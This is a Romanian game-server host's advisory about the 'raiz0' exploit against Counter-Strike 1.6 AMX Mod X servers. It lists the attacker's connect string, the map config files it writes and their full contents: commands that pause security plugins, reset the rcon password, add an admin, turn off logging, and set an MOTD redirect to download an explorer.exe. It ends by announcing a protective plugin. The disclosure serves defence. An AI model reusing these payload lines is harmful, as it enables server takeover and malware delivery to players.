[Fixat] Exploit raiz0

Posted

Un nou tip de exploit a apărut, exploitul crează fișiere cu extensia cfg in care pune diverse linii, aceste linii resciu anumite setări ale serverului, de exemplu va schimbă parola rcon, vă dezactivează pluginurile care previn o serie de alte exploit-uri, pentru a face asta se foloseste de modulul writefile, exemplu :

COM_WriteFile : addons/amxmodx/configs/maps/de_nuke_rarea.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\de_nuke_rarea.cfg

Update: Atacatorul ne-a pus și un video la dispoziție să ne arate cum putea să exploateze serverele.

https://youtube.com/devicesupport

Atacatorul se conectează la server cu:
….connect 48 1899560584 „\prot\3\unique\-1\raw\steam\cdkey\85f1731996f9844694d90d4aa89ad373” „\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\0\cl_lc\1\cl_lw\1\cl_updaterate\20\model\arctic\name\Alex\team\topcolor\topcolor\30\_dr\raiz0\_laleagane\raiz0\_anzo\raiz0\_hns\raiz0\translit\1\_pw\test\_gm\0630\lang\pl\autobind\v1.0\rate\20000″

după care crează următoarele fișiere:

cs/cstrike/addons/amxmodx/configs/maps/de_italy.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_mjolby6.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_c00l_f.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_long.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_tuscan.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_vertigo.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_westwood.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train_32.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_havana.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_perfect_inferno.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_zima.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_amr.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_kabul32.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty_b2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dinaunion.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_arctic.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2x2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_eldorado.cfg
cs/cstrike/addons/amxmodx/configs/maps/as_oilrig.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty.cfgl
cs/cstrike/addons/amxmodx/configs/maps/deathrun_projetocs2.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_lapp.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_romania.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_alexandra.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_epixi.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_cbble.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_mie.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty2k_b2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust4ever.cfg
cs/cstrike/addons/amxmodx/configs/maps/codex_knife.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_inferno2se.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke32.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_india.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_choklad.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_abaddon.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_kolor_v2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_inferno.cfg
cs/cstrike/addons/amxmodx/configs/maps/35hp_alone.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_helvis.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_siege.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_dixor.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dustyaztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainbow2k.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_bycastor32.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_zigzag.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_purplez.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_projetocs.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust4.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_backalley.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_2006.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train32.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_prodigy.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_italy.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_unreal.cfg
cs/cstrike/addons/amxmodx/configs/maps/css_dust2.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_bhopz_v2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_2x2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_cpl_mill_32.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_westwood_big.cfg
cs/cstrike/addons/amxmodx/configs/maps/35hp.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dustvsaztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_ghosts.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainrun.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainbow.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke.cfg
cs/cstrike/addons/amxmodx/configs/maps/hnsm_nemesis.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_chateau.cfg
cs/cstrike/addons/amxmodx/configs/maps/31hp_knife_pro.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_airstrip.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_militia.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_piranesi.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_aztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_bhopz.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_assault.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_industro.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_rooftops.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_estate.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty_b1.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_aztec2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_assault_hotel.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke_rarea.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_lime.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_mjolby3.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_3h.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_rooft0ps_remake.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_kabul.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_love.cfg
cs/cstrike/addons/metamod/exec.cfg

Aceste fișiere conțin setări ca:

amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
amxx pause krond
amxx pause krond.amxx
amxx pause function
rcon_password 198709871234l0l
rcon hostname www.raiz0.org
hostname www.raiz0.org
motdfile motd.txt
motd_write <meta http-equiv=”Refresh” content=”0; url=https://dl.dropboxusercontent.com/u/57066153/java/explorer.exe”>
amx_addadmin „STEAM_0:0:718437961” „abcdefghijklmnopqrstu”
log off
mp_logfile 0

sau

amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
amxx pause krond
amxx pause krond.amxx
amxx pause function
rcon_password 198709871234l0l
rcon hostname www.raiz0.org
hostname www.raiz0.org
motdfile motd.txt
motd_write <meta http-equiv=”Refresh” content=”0; url=https://dl.dropboxusercontent.com/u/57066153/java/explorer.exe”>
amx_addadmin „STEAM_0:0:718437961” „abcdefghijklmnopqrstu”
log off
mp_logfile 0

Astfel vă schimbă parola rcon, are acces de administrator și va poate manipula serverul.

rcon 1899560584 „198709871234l0l” say Server hacked by raiz0@yahoo.com.

Nu știm exact prin ce metode reușeste să creeze acele fișiere, insa in panoul de control la Manage Addons am scos un plugin care vă poate securiza serverul. Numele este: Securizare exploit: raiz0 o dată instalat vă securizează fișierele serverului, daca de exemplu doriți să modificati anumite fișiere prin ftp cum este de exemplu user.ini nu vă este permis, pentru a face totuși acest lucru il puteți dezactiva, faceți modificările și il reactivați până găsim o metodă mai bună de a preveni acest tip de exploit.

Share this page on:Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInPin on Pinterest